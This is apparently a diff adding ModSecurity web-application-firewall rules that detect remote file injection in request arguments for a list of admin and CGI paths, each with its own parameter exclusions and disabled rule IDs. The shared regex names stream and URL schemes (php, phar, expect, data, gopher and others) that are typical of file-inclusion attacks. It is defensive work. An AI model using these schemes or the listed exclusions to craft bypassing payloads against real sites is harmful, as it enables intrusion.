+SecRule REQUEST_FILENAME "/wp-admin/options-general\.php" "phase:2,id:91166,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340213,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/configs\.php" "phase:2,id:91167,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91168,t:none,pass,nolog,skipAfter:END_RULES_91168"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/|!ARGS:/^configParams/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340596,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/|!ARGS:/^configParams/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340597,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91168
+
+SecRule REQUEST_FILENAME "/cgi-bin/formmail\.pl" "phase:2,id:91169,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cgi-bin/formmail\.pl" "phase:2,id:91170,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91171,t:none,pass,nolog,skipAfter:END_RULES_91171"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Recommendations|!ARGS:Comments|!ARGS:background|!ARGS:redirect|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340598,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Recommendations|!ARGS:Comments|!ARGS:background|!ARGS:redirect|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340599,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91171
+
+SecRule REQUEST_FILENAME "/mainsettings\.php" "phase:2,id:91172,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91173,t:none,pass,nolog,skipAfter:END_RULES_91173"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340600,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340601,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91173
+
+SecRule REQUEST_FILENAME "/site\.php" "phase:2,id:91174,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91175,t:none,pass,nolog,skipAfter:END_RULES_91175"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:dict "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340602,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:dict "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340603,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91175
+
+SecRule REQUEST_FILENAME "/admin/ciadmin\.php" "phase:2,id:91176,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91177,t:none,pass,nolog,skipAfter:END_RULES_91177"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:securebase1|!ARGS:base1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340604,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:securebase1|!ARGS:base1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340605,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91177
+
+SecRule REQUEST_FILENAME "/category\.php" "phase:2,id:91178,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91179,t:none,pass,nolog,skipAfter:END_RULES_91179"
+
+SecRule ARGS|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:desc|!ARGS:template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340607,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:desc|!ARGS:template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340608,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91179
+
+SecRule REQUEST_FILENAME "/modules/newbbex/post\.php" "phase:2,id:91180,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91181,t:none,pass,nolog,skipAfter:END_RULES_91181"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:hidden|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340609,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:hidden|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340610,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91181
+
+SecRule REQUEST_FILENAME "/cgi-bin/mb/index2\.cgi" "phase:2,id:91182,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91183,t:none,pass,nolog,skipAfter:END_RULES_91183"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:index|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340611,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:index|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340612,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91183
+
+SecRule REQUEST_FILENAME "/cerberus/parser\.php" "phase:2,id:91184,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91185,t:none,pass,nolog,skipAfter:END_RULES_91185"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:xml|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340613,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:xml|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340614,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91185
+
+SecRule REQUEST_FILENAME "/imp/expand\.php" "phase:2,id:91186,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91187,t:none,pass,nolog,skipAfter:END_RULES_91187"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:field_value|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340615,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:field_value|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340616,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91187
+
+SecRule REQUEST_FILENAME "/livehelp/mastersettings\.php" "phase:2,id:91188,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91189,t:none,pass,nolog,skipAfter:END_RULES_91189"
+
+SecRule ARGS|!ARGS:server|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:newwebpath|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340617,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:server|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:newwebpath|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340618,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91189
+
+SecRule REQUEST_FILENAME "/manager/edit_template\.php" "phase:2,id:91190,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91191,t:none,pass,nolog,skipAfter:END_RULES_91191"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:template|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340619,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:template|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340620,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91191
+
+SecRule REQUEST_FILENAME "/clip/index\.php" "phase:2,id:91192,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91193,t:none,pass,nolog,skipAfter:END_RULES_91193"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:route_to "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340621,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:route_to "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340622,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91193
+
+SecRule REQUEST_FILENAME "/moduleinterface\.php" "phase:2,id:91194,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91195,t:none,pass,nolog,skipAfter:END_RULES_91195"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/template/|!ARGS:/^m1/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340623,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/template/|!ARGS:/^m1/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340624,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91195
+
+SecRule REQUEST_FILENAME "/cpanel/savetype\.php" "phase:2,id:91196,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91197,t:none,pass,nolog,skipAfter:END_RULES_91197"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:embed "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340625,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:embed "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340626,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91197
+
+SecRule REQUEST_FILENAME "/admin/basic_settings\.php" "phase:2,id:91198,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91199,t:none,pass,nolog,skipAfter:END_RULES_91199"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:custom_promo_code "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340627,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:custom_promo_code "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340628,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91199
+
+SecRule REQUEST_FILENAME "/admin/site_setup\.php" "phase:2,id:91200,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91201,t:none,pass,nolog,skipAfter:END_RULES_91201"
+
